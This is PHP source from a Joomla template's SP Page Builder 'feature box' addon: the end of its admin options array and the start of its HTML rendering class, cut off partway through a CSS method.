					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_URL_APEAR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_URL_APEAR_DESC'),
					'values'=>array(
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_URL_APEAR_TITLE'),
						'icon'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_URL_APEAR_ICON'),
						'both'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_URL_APEAR_BOTH'),
					),
					'std'=>'title',
					'depends'=>array(array('title_url', '!=', '')),
				),

				'feature_type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_LAYOUT_TYPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_LAYOUT_TYPE_DESC'),
					'values'=> array(
						'icon'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_LAYOUT_TYPE_ICON'),
						'image'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE'),
						'both'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_LAYOUT_TYPE_BOTH'),
					),
					'std' => 'icon'
				),

				'separator_image_options'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_image_OPTIONS'),
					'depends'=>array(
                        array('feature_type', '!=', 'icon'),
                    )
				),

				'feature_image'=>array(
					'type' => 'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_IMAGE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_IMAGE_DESC'),
					'depends'=>array(
                        array('feature_type', '!=', 'icon'),
					),
					'std'=> array(
						'src' => '',
						'height' => '',
						'width' => '',
					),
				),
				'feature_image_width'=>array(
					'type' => 'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_IMAGE_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_IMAGE_WIDTH_DESC'),
                    'responsive' => true,
                    'max'=> 100,
					'std' => array('md'=>50),
					'depends' => array(
                        array('feature_type', '!=', 'icon'),
                        array('title_position', '!=', 'before'),
                        array('title_position', '!=', 'after'),
                    )
				),
                'feature_image_margin'=>array(
                    'type'=>'margin',
                    'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN'),
                    'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN_DESC'),
                    'depends'=>array(
                        array('feature_type', '!=', 'icon'),
                    ),
                    'responsive' => true
				),
                            
                'separator_icon_options'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_OPTIONS'),
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    )
				),
				
				'peicon_name'=>array( // Pixeden Icons
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
					'std'=>'',
					'values'=> $peicon_list,
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    )
				),

				'icon_name'=>array(
					'type'=>'icon',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_NAME'),
					'std'=> 'fa-trophy',
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    )
				),

				'icon_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_SIZE'),
					'placeholder'=>36,
					'std'=>array('md'=>36),
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    ),
					'responsive' => true,
					'max'=> 400,
				),

				'icon_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_COLOR'),
					'std'=>'#0080FE',
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    )
				),

				'icon_background'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_COLOR'),
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    )
				),

				'icon_border_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_COLOR'),
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    )
				),

				'icon_border_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_WIDTH'),
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    ),
					'responsive' => true,
					'max'=> 400,
				),

				'icon_border_radius'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_RADIUS'),
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    ),
					'responsive' => true,
					'max'=> 400,
				),

				'icon_boxshadow'=>array(
					'type'=>'boxshadow',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ICON_BOXSHADOW'),
					'std'=>'0 0 0 0 #ffffff'
				),

				'icon_margin_top'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN_TOP'),
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    ),
					'responsive' => true,
					'min'=> -200,
					'max'=> 400,
				),

				'icon_margin_bottom'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN_BOTTOM'),
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    ),
					'responsive' => true,
					'max'=> 400,
				),

				'icon_padding'=>array(
					'type'=>'padding',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING_DESC'),
					'depends'=>array(
                        array('feature_type', '!=', 'image'),
                    ),
					'responsive' => true
				),

				'separator_addon_options'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_OPTIONS')
				),

				'text'=>array(
					'type'=>'editor',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CONTENT'),
					'std'=>'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer adipiscing erat eget risus sollicitudin pellentesque et non erat. Maecenas nibh dolor, malesuada et bibendum a, sagittis accumsan ipsum.'
				),

				'text_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_FONT_FAMILY_DESC'),
					'depends'=>array(array('text', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-addon-content .sppb-addon-text { font-family: "{{ VALUE }}"; }'
					)
				),

				'text_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CONTENT_FONT_SIZE'),
					'std'=>'',
					'max'=>400,
					'responsive'=>true
				),

				'text_fontweight'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_FONTWEIGHT'),
					'values'=>array(
						'100'=>100,
						'200'=>200,
						'300'=>300,
						'400'=>400,
						'500'=>500,
						'600'=>600,
						'700'=>700,
						'900'=>900,
					),
					'std'=>'',
				),

				'text_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CONTENT_LINE_HEIGHT'),
					'std'=>'',
					'max'=>400,
					'responsive'=>true
				),
                                
                'text_background'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_COLOR'),
				),
                'text_padding'=>array(
					'type'=>'padding',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING_DESC'),
					'responsive' => true
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-center',
				),

				'global_separator'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CON_HOVER_OPTIONS'),
				),
				'addon_hover_bg'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_HOVER_BG'),
				),
				'addon_hover_boxshadow'=>array(
					'type'=>'boxshadow',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_HOVER_BOXSHADOW'),
					'std'=>'0 0 0 0 #ffffff'
				),
				'addon_hover_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_ADDON_HOVER_COLOR'),
				),
				'title_hover_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_TITLE_HOVER_COLOR'),
				),
				'icon_hover_bg'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_ICON_HOVER_BG'),
				),
				'icon_hover_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FEATURE_BOX_ICON_HOVER_COLOR'),
				),
				//Button
				'button_options' => array(
					'type' => 'separator',
					'title' => JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_OPTIONS'),
				),
				'btn_text' => array(
					'type' => 'text',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
				),
				'btn_font_family' => array(
					'type' => 'fonts',
					'title' => JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONT_FAMILY'),
					'selector' => array(
						'type' => 'font',
						'font' => '{{ VALUE }}',
						'css' => '.sppb-btn { font-family: "{{ VALUE }}"; }'
					),
					'depends'=>array(
						array('btn_text', '!=', ''),
					)
				),
				'btn_font_style' => array(
					'type' => 'fontstyle',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
					'depends'=>array(
						array('btn_text', '!=', ''),
					)
				),

				'btn_letterspace' => array(
					'type' => 'select',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
					'values' => array(
						'-10px'=> '-10px',
						'-9px'=>  '-9px',
						'-8px'=>  '-8px',
						'-7px'=>  '-7px',
						'-6px'=>  '-6px',
						'-5px'=>  '-5px',
						'-4px'=>  '-4px',
						'-3px'=>  '-3px',
						'-2px'=>  '-2px',
						'-1px'=>  '-1px',
						'0px'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std' => '0px',
					'depends'=>array(
						array('btn_text', '!=', ''),
					)
				),
				'btn_url' => array(
					'type' => 'media',
					'format' => 'attachment',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL_DESC'),
					'placeholder' => 'http://',
					'hide_preview' => true,
					'depends'=>array(
						array('btn_text', '!=', ''),
					)
				),
				'btn_target' => array(
					'type' => 'select',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB_DESC'),
					'values' => array(
						'' => JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
						'_blank' => JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
					),
					'depends' => array(array('btn_url', '!=', '')),
				),
				'btn_type' => array(
					'type' => 'select',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
					'values' => array(
						'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
						'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
						'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
						'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
						'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
						'secondary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SECONDARY'),
						'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
						'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
						'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
						'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
						'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
						'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
					),
					'std' => 'custom',
					'depends'=>array(
						array('btn_text', '!=', ''),
					)
				),
				'btn_appearance' => array(
					'type' => 'select',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
					'values' => array(
						'' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
						'gradient' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_GRADIENT'),
						'outline' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
						'3d' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
					),
					'std' => '',
					'depends'=>array(
						array('btn_text', '!=', ''),
					)
				),
				'btn_fontsize' => array(
					'type' => 'slider',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_SIZE'),
					'std' => array('md' => 16),
					'responsive' => true,
					'max' => 400,
					'depends' => array(
						array('btn_type', '=', 'custom'),
						array('btn_text', '!=', ''),
					)
				),
				'button_status' => array(
					'type' => 'buttons',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_ENABLE_BACKGROUND_OPTIONS'),
					'std' => 'normal',
					'values' => array(
						array(
							'label' => 'Normal',
							'value' => 'normal'
						),
						array(
							'label' => 'Hover',
							'value' => 'hover'
						),
					),
					'tabs' => true,
					'depends' => array(
						array('btn_type', '=', 'custom'),
						array('btn_text', '!=', ''),
					)
				),
				'btn_background_color' => array(
					'type' => 'color',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
					'std' => '#0080FE',
					'depends' => array(
						array('btn_appearance', '!=', 'gradient'),
						array('btn_type', '=', 'custom'),
						array('button_status', '=', 'normal'),
						array('btn_text', '!=', ''),
					)
				),
				'btn_background_gradient' => array(
					'type' => 'gradient',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
					'std' => array(
						"color" => "#B4EC51",
						"color2" => "#429321",
						"deg" => "45",
						"type" => "linear"
					),
					'depends' => array(
						array('btn_appearance', '=', 'gradient'),
						array('btn_type', '=', 'custom'),
						array('button_status', '=', 'normal'),
					)
				),
				'btn_color' => array(
					'type' => 'color',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
					'std' => '#FFFFFF',
					'depends' => array(
						array('btn_type', '=', 'custom'),
						array('button_status', '=', 'normal'),
						array('btn_text', '!=', ''),
					),
				),
				'btn_background_color_hover' => array(
					'type' => 'color',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
					'std' => '#de6906',
					'depends' => array(
						array('btn_appearance', '!=', 'gradient'),
						array('btn_type', '=', 'custom'),
						array('button_status', '=', 'hover'),
					)
				),
				'btn_background_gradient_hover' => array(
					'type' => 'gradient',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
					'std' => array(
						"color" => "#429321",
						"color2" => "#B4EC51",
						"deg" => "45",
						"type" => "linear"
					),
					'depends' => array(
						array('btn_appearance', '=', 'gradient'),
						array('btn_type', '=', 'custom'),
						array('button_status', '=', 'hover'),
					)
				),
				'btn_color_hover' => array(
					'type' => 'color',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
					'std' => '#FFFFFF',
					'depends' => array(
						array('btn_type', '=', 'custom'),
						array('button_status', '=', 'hover'),
					),
				),
				'button_margin'=>array(
					'type'=>'margin',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_MARGIN_DESC'),
					'placeholder'=>'10px 10px 10px 10px',
					'depends'=>array(
						array('btn_text', '!=', ''),
					),
					'responsive' => true,
					'std' => '25px 0px 0px 0px',
				),
				'button_padding' => array(
					'type' => 'padding',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING_DESC'),
					'std'=>'',
					'depends' => array(
						array('btn_type', '=', 'custom'),
						array('btn_text', '!=', ''),
					),
					'responsive' => true,
					'std' => '8px 22px 10px 22px',
				),
				'btn_size' => array(
					'type' => 'select',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
					'values' => array(
						'' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
						'lg' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
						'xlg' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
						'sm' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
						'xs' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
					),
					'depends'=>array(
						array('btn_text', '!=', ''),
					),
					'std'=>''
				),
				'btn_shape' => array(
					'type' => 'select',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
					'values' => array(
						'rounded' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
						'square' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
						'round' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
					),
					'depends'=>array(
						array('btn_text', '!=', ''),
					),
					'std'=>'square'
				),
				'btn_block' => array(
					'type' => 'select',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
					'values' => array(
						'' => JText::_('JNO'),
						'sppb-btn-block' => JText::_('JYES'),
					),
					'depends' => array(
						array('btn_type', '!=', 'link'),
					)
				),
				'btn_icon' => array(
					'type' => 'icon',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON'),
					'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_DESC'),
					'depends'=>array(
						array('btn_text', '!=', ''),
					)
				),
				'btn_icon_position' => array(
					'type' => 'select',
					'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
					'values' => array(
						'left' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'right' => JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std' => 'left',
					'depends'=>array(
						array('btn_text', '!=', ''),
					)
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);PK!�ڸY�Y�*flex/sppagebuilder/addons/feature/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
defined ('_JEXEC') or die ('Restricted access');

class SppagebuilderAddonFeature extends SppagebuilderAddons {

	public function render() {
		
		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);
		
		$settings = $this->addon->settings;
		$class = (isset($settings->class) && $settings->class) ? $settings->class : '';
		$title = (isset($settings->title) && $settings->title) ? $settings->title : '';
		$heading_selector = (isset($settings->heading_selector) && $settings->heading_selector) ? $settings->heading_selector : 'h3';

		//Options
		$title_url = (isset($settings->title_url) && $settings->title_url) ? $settings->title_url : '';
		$link_open_new_window = (isset($settings->link_open_new_window) && $settings->link_open_new_window) ? $settings->link_open_new_window : '';
		$url_appear = (isset($settings->url_appear) && $settings->url_appear) ? $settings->url_appear : 'title';
		$title_position = (isset($settings->title_position) && $settings->title_position) ? $settings->title_position : 'before';
		$feature_type = (isset($settings->feature_type) && $settings->feature_type) ? $settings->feature_type : 'icon';
		$feature_image = (isset($settings->feature_image) && $settings->feature_image) ? $settings->feature_image : '';
		//Pixeden Icons
		$peicon_name = (isset($this->addon->settings->peicon_name) && $this->addon->settings->peicon_name) ? $this->addon->settings->peicon_name : '';
		$icon_name = (isset($settings->icon_name) && $settings->icon_name) ? $settings->icon_name : '';
		$text = (isset($settings->text) && $settings->text) ? $settings->text : '';
		$text_alignment = (isset($settings->alignment) && $settings->alignment) ? $settings->alignment : '';

		$feature_image_link = '';
		if(strpos($feature_image, "http://") !== false || strpos($feature_image, "https://") !== false){
			$feature_image_link = $feature_image;
		} else {
			$feature_image_link= JURI::base(true) . '/' . $feature_image;
		}
                
		//Image or icon position
		$icon_image_position = '';
		if($title_position == 'before') {
			$icon_image_position = 'after';
		} else if($title_position == 'after') {
			$icon_image_position = 'before';
		} else {
			$icon_image_position = $title_position;
		}

		//Reset Alignment for left and right style
        $alignment='';
		if( ($icon_image_position=='left') || ($icon_image_position=='right') ) {
			$alignment = 'sppb-text-' . $icon_image_position;
		}

		//Icon or Image
		$media = '';
		if($feature_type == 'icon') {
			if($icon_name || $peicon_name) {
				$media  .= '<div class="sppb-icon">';
					if( ($title_url && $url_appear == 'icon') || ($title_url && $url_appear == 'both' ) ) $media .= '<a href="'. $title_url .'"'.($link_open_new_window ? ' rel="noopener noreferrer" target="_blank"' : '').'>';
                        $media  .= '<span class="sppb-icon-container">';
						
						if ($peicon_name != '') {
							$media  .= '<i aria-hidden="true" aria-label="'.$title.'" class="pe ' . $peicon_name . '"></i>';
						}else{
							$media  .= '<i aria-hidden="true" aria-label="'.$title.'" class="fa ' . $icon_name . '"></i>';
						}
						
                        $media  .= '</span>';
                    if(($title_url && $url_appear == 'icon') || ($title_url && $url_appear == 'both' )) $media .= '</a>';
				$media  .= '</div>';
			}
		} else {
			if($feature_image) {
				$media  .= '<span class="sppb-img-container">';
				if( ($title_url && $url_appear == 'icon') || ($title_url && $url_appear == 'both' ) ) $media .= '<a href="'. $title_url .'"'.($link_open_new_window ? ' rel="noopener noreferrer" target="_blank"' : '').'>';
				
				/* Lazyload for images */
				if($has_lazyload) {
					$media .= '<img class="lazyload sppb-img-responsive' . $class . '" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. $feature_image_link .'" alt="'.strip_tags($title).'" data-expand="-5">';
				} else {
					$media .= '<img class="sppb-img-responsive" src="' . $feature_image_link . '" alt="'.strip_tags($title).'">';
				}
				
				
				if(($title_url && $url_appear == 'icon') || ($title_url && $url_appear == 'both' )) $media .= '</a>';
				$media  .= '</span>';
			}
		}
        //Image and icon
        $image_icon = '';
        if($feature_type == 'both' && ($icon_name || $peicon_name)) {
            $image_icon .= '<div class="sppb-icon">';
                if( ($title_url && $url_appear == 'icon') || ($title_url && $url_appear == 'both' )) $image_icon .= '<a href="'. $title_url .'"'.($link_open_new_window ? ' rel="noopener noreferrer" target="_blank"' : '').'>';
					$image_icon .= '<span class="sppb-icon-container">';
					if ($peicon_name) {
						$image_icon  .= '<i aria-hidden="true" aria-label="'.$title.'" class="pe ' . $peicon_name . '"></i>';
					}else{
						$image_icon  .= '<i aria-hidden="true" aria-label="'.$title.'" class="fa ' . $icon_name . '"></i>';
					}
                    $image_icon .= '</span>';
                if(($title_url && $url_appear == 'icon') || ($title_url && $url_appear == 'both' )) $image_icon .= '</a>';
            $image_icon .= '</div>';
        }
		

		//Title
		$feature_title = '';
		if($title) {
			$heading_class = '';
			if( ($icon_image_position=='left') || ($icon_image_position=='right') ) {
				$heading_class = ' sppb-media-heading';
			}

			$feature_title .= '<'.$heading_selector.' class="sppb-addon-title sppb-feature-box-title'. $heading_class .'">';
			if( ($title_url && $url_appear == 'title') || ($title_url && $url_appear == 'both' ) ) $feature_title .= '<a href="'. $title_url .'"'.($link_open_new_window ? ' rel="noopener noreferrer" target="_blank"' : '').'>';
			$feature_title .= $title;
			if(($title_url && $url_appear == 'title') || ($title_url && $url_appear == 'both' )) $feature_title .= '</a>';
			$feature_title .= '</'.$heading_selector.'>';
		}

		//Feature Text
		$feature_text  = '<div class="sppb-addon-text">';
		$feature_text .= $text;
		$feature_text .= '</div>';

		//Output
		$output  = '<div class="sppb-addon sppb-addon-feature ' . $alignment . ' ' . $class . '">';
		$output .= '<div class="sppb-addon-content '.$text_alignment.'">';

		if ($icon_image_position == 'before') {
			$output .= ($media) ? $media : '';
			$output .= '<div class="sppb-media-content">';
			$output .= ($title) ? $feature_title : '';
			$output .= $feature_text;
			$output .= '</div>';
		} else if ($icon_image_position == 'after') {
			$output .= ($title) ? $feature_title : '';
			$output .= ($media) ? $media : '';
            $output .= '<div class="sppb-media-content">';
			$output .= $feature_text;
            $output .= '</div>';
		} else {
			if($media) {
				$output .= '<div class="sppb-media">';
				$output .= '<div class="pull-'. $icon_image_position .'">';
				$output .= $media;
				$output .= '</div>';
				$output .= '<div class="sppb-media-body">';
				$output .= '<div class="sppb-media-content">';
				$output .= $image_icon;
				$output .= ($title) ? $feature_title : '';
				$output .= $feature_text;
				$output .= '</div>';//.sppb-media-content
				$output .= '</div>';
				$output .= '</div>';
			}
		}

		$output .= '</div>';
		$output .= '</div>';

		return $output;
	}

	public function css() {
		$settings = $this->addon->settings;
		$addon_id = '#sppb-addon-' . $this->addon->id;
		//icon css
		$icon_color	= (isset($settings->icon_color) && $settings->icon_color) ? $settings->icon_color : '';
		$icon_size = (isset($settings->icon_size) && $settings->icon_size) ? $settings->icon_size : '';
		$icon_size_sm = (isset($settings->icon_size_sm) && $settings->icon_size_sm) ? $settings->icon_size_sm : '';
		$icon_size_xs = (isset($settings->icon_size_xs) && $settings->icon_size_xs) ? $settings->icon_size_xs : '';
		$icon_border_color = (isset($settings->icon_border_color) && $settings->icon_border_color) ? $settings->icon_border_color : '';
		$icon_border_width = (isset($settings->icon_border_width) && $settings->icon_border_width) ? $settings->icon_border_width : '';
		$icon_border_width_sm = (isset($settings->icon_border_width_sm) && $settings->icon_border_width_sm) ? $settings->icon_border_width_sm : '';
		$icon_border_width_xs = (isset($settings->icon_border_width_xs) && $settings->icon_border_width_xs) ? $settings->icon_border_width_xs : '';
		$icon_border_radius	= (isset($settings->icon_border_radius) && $settings->icon_border_radius) ? $settings->icon_border_radius : '';
		$icon_border_radius_sm	= (isset($settings->icon_border_radius_sm) && $settings->icon_border_radius_sm) ? $settings->icon_border_radius_sm : '';
		$icon_border_radius_xs	= (isset($settings->icon_border_radius_xs) && $settings->icon_border_radius_xs) ? $settings->icon_border_radius_xs : '';
		$icon_background = (isset($settings->icon_background) && $settings->icon_background) ? $settings->icon_background : '';
		$icon_margin_top = (isset($settings->icon_margin_top) && $settings->icon_margin_top) ? $settings->icon_margin_top : '';
